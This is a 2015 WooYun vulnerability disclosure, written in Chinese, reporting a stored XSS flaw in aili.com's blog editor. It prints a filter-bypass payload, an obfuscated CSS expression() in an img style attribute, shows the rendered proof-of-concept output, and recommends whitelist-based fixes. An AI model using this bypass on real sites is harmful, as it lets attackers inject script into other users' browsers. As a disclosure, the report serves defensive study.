当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095324

漏洞标题:爱丽网日志处存储型XSS

相关厂商:aili.com

漏洞作者: 我是小号

提交时间:2015-02-03 10:42

修复时间:2015-03-20 10:44

公开时间:2015-03-20 10:44

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-03: 细节已通知厂商并且等待厂商处理中
2015-02-03: 厂商已经确认,细节仅向厂商公开
2015-02-13: 细节向核心白帽子及相关领域专家公开
2015-02-23: 细节向普通白帽子公开
2015-03-05: 细节向实习白帽子公开
2015-03-20: 细节向公众公开

简要描述:

富文本跨站脚本过滤器绕过

详细说明:

原理:
利用<img>标签的内联样式列表(Style属性)构造:

STYLE="xxx:expr&#x65;ssio/*\0*/n(if(!window.x){alert('xss');window.x=1;})"


先随便插入一张图片,然后Firefox下打开FireBug,插入上面的内联样式列表:

01.png


http://member.aili.com/

漏洞证明:

网页内输出:

<img width="540" height="258" style="xxx:expressio/*\0*/n(if(!window.x){alert(document.domain);window.x=1;})" src="http://www.baidu.com/img/bd_logo1.png" data_ue_src="http://www.baidu.com/img/bd_logo1.png">


QQ浏览器(IE11内核)成功弹窗
document.domain:

02.png


修复方案:

1.通过htmlparser可以解析出HTML代码的标签,标签属性和事件。在过滤符文本时,“事件”应该被严格禁止。同时危险的标签<iframe>、<base>、<script>、<form>等。
2.在标签的选择上,应该使用白名单,避免使用黑名单(Security By Default)
3.尽可能禁止用户自定义CSS与style,如果必要,则使用CSS Parser进行检查。

版权声明:转载请注明来源 我是小号@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-03 10:52

厂商回复:

修复方案如此详细,让我们自愧不如……

最新状态:

暂无


漏洞评价:

评论